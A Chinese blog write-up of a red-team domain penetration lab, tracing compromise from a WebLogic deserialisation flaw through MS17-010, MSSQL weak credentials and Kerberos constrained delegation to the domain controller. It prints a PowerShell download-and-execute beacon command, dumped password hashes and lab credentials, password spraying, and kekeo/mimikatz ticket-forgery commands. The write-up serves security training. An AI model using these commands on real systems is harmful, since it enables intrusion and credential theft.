<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.0.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" integrity="sha256-CTSx/A06dm1B063156EVh15m6Y67pAjZZaQc89LLSrU=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.18.2","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="靶场网络拓扑图  外网打点-web机上线nmap端口扫描  访问7001端口，是weblogic的web服务端，使用weblogic利用工具进行检测，存在cve-2016-0638  写入webshell，网站目录在 C:\Oracle\Middleware\Oracle_Home\wlserver\server\lib\consoleapp\webapp下，这里注意写入js或者css等静态资源文">
<meta property="og:type" content="article">
<meta property="og:title" content="writeup-渗透攻击红队内网域渗透靶场-1">
<meta property="og:url" content="http://example.com/2023/08/13/writeup-%E6%B8%97%E9%80%8F%E6%94%BB%E5%87%BB%E7%BA%A2%E9%98%9F%E5%86%85%E7%BD%91%E5%9F%9F%E6%B8%97%E9%80%8F%E9%9D%B6%E5%9C%BA-1/index.html">
<meta property="og:site_name" content="Al0neme&#39;s Blog">
<meta property="og:description" content="靶场网络拓扑图  外网打点-web机上线nmap端口扫描  访问7001端口，是weblogic的web服务端，使用weblogic利用工具进行检测，存在cve-2016-0638  写入webshell，网站目录在 C:\Oracle\Middleware\Oracle_Home\wlserver\server\lib\consoleapp\webapp下，这里注意写入js或者css等静态资源文">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308061117868.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308061121520.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308061509283.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308061517548.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308061515143.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308061641930.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308061827948.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308062235529.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308062234027.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308062252676.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308062255724.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308062256209.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308062257718.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308072113216.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308072118180.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308112223230.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308072020353.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308071948774.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308072100875.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308112347106.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121209305.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121209998.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121455054.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121455310.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121644846.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121647090.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121742689.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121806506.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121831437.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308122038910.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308122231492.png">
<meta property="og:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308122251058.png">
<meta property="article:published_time" content="2023-08-12T16:00:00.000Z">
<meta property="article:modified_time" content="2023-11-26T08:33:10.852Z">
<meta property="article:author" content="Al0neme">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308061117868.png">


<link rel="canonical" href="http://example.com/2023/08/13/writeup-%E6%B8%97%E9%80%8F%E6%94%BB%E5%87%BB%E7%BA%A2%E9%98%9F%E5%86%85%E7%BD%91%E5%9F%9F%E6%B8%97%E9%80%8F%E9%9D%B6%E5%9C%BA-1/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2023/08/13/writeup-%E6%B8%97%E9%80%8F%E6%94%BB%E5%87%BB%E7%BA%A2%E9%98%9F%E5%86%85%E7%BD%91%E5%9F%9F%E6%B8%97%E9%80%8F%E9%9D%B6%E5%9C%BA-1/","path":"2023/08/13/writeup-渗透攻击红队内网域渗透靶场-1/","title":"writeup-渗透攻击红队内网域渗透靶场-1"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>writeup-渗透攻击红队内网域渗透靶场-1 | Al0neme's Blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Al0neme's Blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-笔记"><a href="/notes/" rel="section"><i class="fa fa-archive fa-fw"></i>笔记</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9-web%E6%9C%BA%E4%B8%8A%E7%BA%BF"><span class="nav-number">1.</span> <span class="nav-text">外网打点-web机上线</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ms17-010%E7%9B%B2%E6%89%93-win7%E4%B8%8A%E7%BA%BF"><span class="nav-number">2.</span> <span class="nav-text">ms17_010盲打-win7上线</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BC%B1%E5%8F%A3%E4%BB%A4-sqlserver%E4%B8%8A%E7%BA%BF"><span class="nav-number">3.</span> <span class="nav-text">弱口令-sqlserver上线</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE-%E8%AE%BF%E9%97%AE%E5%9F%9F%E6%8E%A7"><span class="nav-number">4.</span> <span class="nav-text">约束委派-访问域控</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ms14-068-%E5%9F%9F%E6%8E%A7%E4%B8%8A%E7%BA%BF"><span class="nav-number">5.</span> <span class="nav-text">ms14_068-域控上线</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="nav-number">6.</span> <span class="nav-text">参考链接</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Al0neme</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">6</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/08/13/writeup-%E6%B8%97%E9%80%8F%E6%94%BB%E5%87%BB%E7%BA%A2%E9%98%9F%E5%86%85%E7%BD%91%E5%9F%9F%E6%B8%97%E9%80%8F%E9%9D%B6%E5%9C%BA-1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Al0neme">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Al0neme's Blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="writeup-渗透攻击红队内网域渗透靶场-1 | Al0neme's Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          writeup-渗透攻击红队内网域渗透靶场-1
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-08-13 00:00:00" itemprop="dateCreated datePublished" datetime="2023-08-13T00:00:00+08:00">2023-08-13</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>靶场网络拓扑图</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308061117868.png" alt="img"></p>
<h3 id="外网打点-web机上线"><a href="#外网打点-web机上线" class="headerlink" title="外网打点-web机上线"></a>外网打点-web机上线</h3><p>nmap端口扫描</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308061121520.png" alt="image-20230806112132492"></p>
<p>访问7001端口，是weblogic的web服务端，使用weblogic利用工具进行检测，存在cve-2016-0638</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308061509283.png" alt="image-20230806150948230"></p>
<p>写入webshell，网站目录在 <code>C:\Oracle\Middleware\Oracle_Home\wlserver\server\lib\consoleapp\webapp</code>下，这里注意写入js或者css等静态资源文件目录下，写在根目录下访问会跳转，注意webshell的兼容性，可能会报错</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308061517548.png" alt="image-20230806151730493"></p>
<p>访问webshell</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308061515143.png" alt="image-20230806151553081"></p>
<p>利用powershell远程下载执行上线cs</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell.exe -nop -w hidden -c &quot;IEX ((new-object net.webclient).downloadstring(&#x27;http://192.168.0.12:800/a.css&#x27;))&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308061641930.png" alt="image-20230806164155860"></p>
<p>因为这里是工作组环境，加上已经是administrator权限，所以没有提权细究，使用ping命令探测内网，发现另一台机子</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for /l %i in (1,1,254) do @ping -w 1 -n 1 10.10.20.%i | findstr &quot;TTL=&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308061827948.png" alt="image-20230806182710908"></p>
<h3 id="ms17-010盲打-win7上线"><a href="#ms17-010盲打-win7上线" class="headerlink" title="ms17_010盲打-win7上线"></a>ms17_010盲打-win7上线</h3><p>msf设置上层全局代理</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308062235529.png" alt="image-20230806223529483"></p>
<p>对10.10.20.7进行盲打（有蓝屏机率）</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308062234027.png" alt="image-20230806223443949"></p>
<p>上传cs的正向shell，先生成一个exe stage，这里尝试了生成服务的，但是连接失败了，exe可以上线</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308062252676.png" alt="image-20230806225207571"></p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308062255724.png" alt="image-20230806225515688"></p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308062256209.png" alt="image-20230806225619167"></p>
<p>确定存在域环境</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308062257718.png" alt="image-20230806225738661"></p>
<p>确定域控地址</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308072113216.png" alt="image-20230807211317186"></p>
<p>mimikatz没有抓取到本地明文，应该是没有登陆过的原因，后面尝试域用户登陆了一次，才可以抓取带明文，这里直接抓取本地hash，在线查找破解，密码为<code>admin!@#45</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span><br><span class="line">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span><br><span class="line">john:1000:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c:::</span><br></pre></td></tr></table></figure>

<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308072118180.png" alt="image-20230807211826141"></p>
<p>利用kerbrute使用破解得到的密码和<code>net user /domain</code>得到的用户进行密码喷洒，得到一个域用户和密码</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308112223230.png" alt="image-20230811222321140"></p>
<p>查看网卡信息</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308072020353.png" alt="image-20230807202047315"></p>
<p>ping探测</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308071948774.png" alt="image-20230807194812692"></p>
<h3 id="弱口令-sqlserver上线"><a href="#弱口令-sqlserver上线" class="headerlink" title="弱口令-sqlserver上线"></a>弱口令-sqlserver上线</h3><p>端口扫描（这里因为环境问题，恢复了一次快照，才扫到了数据库的1433）</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308072100875.png" alt="image-20230807210046825"></p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308112347106.png" alt="image-20230811234758055"></p>
<p>fscan指定端口爆破（其他数据库爆破工具也可以），凭证为<code>sa sa</code></p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121209305.png" alt="image-20230812120903213"></p>
<p>使用rpcon对mssql进行利用，xp_cmdshell命令执行</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121209998.png" alt="image-20230812120940968"></p>
<p>执行一些长命令和有各种符号的命令时比较麻烦，暂时没有找到合适顺手的正向代理工具，所以利用msf挂一个正向代理</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121455054.png" alt="image-20230812145532993"></p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121455310.png" alt="image-20230812145509239"></p>
<p>因为win7对外不出网，但是win7和sqlserver这台机子互通，所以使用http-server工具在win7上开启一个建议http服务，用于存放生成的beacon，sqlserver这台机子使用certutil落地文件，上线cs</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121644846.png" alt="image-20230812164415770"></p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121647090.png" alt="image-20230812164703037"></p>
<p>查看补丁信息，使用cve-2019-1458提升权限，有蓝屏机率，后面换成了ms14_058</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121742689.png" alt="image-20230812174220624"></p>
<p>mimikatz抓取明文密码</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121806506.png" alt="image-20230812180646469"></p>
<h3 id="约束委派-访问域控"><a href="#约束委派-访问域控" class="headerlink" title="约束委派-访问域控"></a>约束委派-访问域控</h3><p>使用获取到的账户结合adfind查找约束委派用户，返回约束委派用户为sqlserver</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">AdFind.exe -h 10.10.10.8 -u sqlserver -up Server12345 -b &quot;DC=redteam,DC=red&quot; -f &quot;(&amp;(samAccountType=805306368)(msds-allowedtodelegateto=*))&quot; cn distinguishedName msds-allowedtodelegateto</span><br></pre></td></tr></table></figure>

<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308121831437.png" alt="image-20230812183148395"></p>
<p>利用约束委派进行攻击，执行kekeo时因为是直接在cs执行的，会一直出现<code>kekeo # ERROR kull_m_cli_read ; ReadConsole (0x00000006)</code>报错，注意进程情况自己kill掉（真实cmd终端下是交互式shell应该不会）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">//请求TGT</span><br><span class="line">//生成TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi文件</span><br><span class="line">kekeo.exe &quot;tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345&quot;</span><br><span class="line"></span><br><span class="line">//伪造票据ticket</span><br><span class="line">//生成TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi文件</span><br><span class="line">//生成TGS_Administrator@redteam.red@REDTEAM.RED_sqlserver@REDTEAM.RED.kirbi文件</span><br><span class="line">kekeo.exe &quot;tgs::s4u /tgt:TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red /service:cifs/owa.redteam.red&quot;</span><br><span class="line"></span><br><span class="line">//清空内存中的票据</span><br><span class="line">klist purge</span><br><span class="line"></span><br><span class="line">//mimikatz导入</span><br><span class="line">mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi</span><br><span class="line"></span><br><span class="line">//验证，可能执行几次后就不行了，重复mimikatz那一步即可</span><br><span class="line">dir \\owa\c$</span><br></pre></td></tr></table></figure>

<p>查看flag</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308122038910.png" alt="image-20230812203852855"></p>
<h3 id="ms14-068-域控上线"><a href="#ms14-068-域控上线" class="headerlink" title="ms14_068-域控上线"></a>ms14_068-域控上线</h3><p>利用约束委派复制文件到域控，尝试了手动使用psexec以及wmic执行，但未成功，可能是约束委派的权限问题或者其他操作问题？</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">copy oo.exe \\owa\c$\users\public\oo.exe</span><br><span class="line">psexec.exe -accepteula \\10.10.10.8\ c:\users\public\oo.exe</span><br></pre></td></tr></table></figure>

<p>查看<code>c:\windows\windowsupdate.log</code>中的补丁信息，使用goldenPac.exe（ms14_068结合psexec）上线CS</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308122231492.png" alt="image-20230812223153444"></p>
<p>得到的直接是system会话</p>
<p><img src="https://al0neme-staticfile.oss-cn-hangzhou.aliyuncs.com/static/202308122251058.png" alt="image-20230812225141985"></p>
<h3 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h3><p>其他攻击方式参考：</p>
<p><a target="_blank" rel="noopener" href="https://blog.laohuan.art/2021/12/24/%E6%B8%97%E9%80%8F%E6%94%BB%E5%87%BB%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA/">渗透攻击红队靶场 | Laohuan’s Blog</a></p>
<p>官方公众号参考：</p>
<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/dcYbIfLwN-Aw0Z9XxQSGkQ">从外网 Weblogic 打进内网，再到约束委派接管域控 (qq.com)</a></p>
<p>约束委派参考：</p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/network/370073.html">一篇文章讲清楚“什么是委派攻击” - FreeBuf网络安全行业门户</a></p>
<p>ms14_068参考</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/f-carey/p/16843006.html">内网安全之：MS14-068 Kerberos 域用户提权漏洞 - f_carey - 博客园 (cnblogs.com)</a></p>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/07/23/log4j2%E6%BC%8F%E6%B4%9E%E5%9F%BA%E7%A1%80/" rel="prev" title="log4j2漏洞基础">
                  <i class="fa fa-angle-left"></i> log4j2漏洞基础
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/08/26/writeup-%E6%B8%97%E9%80%8F%E6%94%BB%E5%87%BB%E7%BA%A2%E9%98%9F%E5%9F%9F%E6%B8%97%E9%80%8F%E9%9D%B6%E5%9C%BA-2%EF%BC%88redteam.lab%EF%BC%89/" rel="next" title="writeup-渗透攻击红队域渗透靶场-2（redteam.lab）">
                  writeup-渗透攻击红队域渗透靶场-2（redteam.lab） <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Al0neme</span>
  </div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>
-->

    </div>
  </footer>

  
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
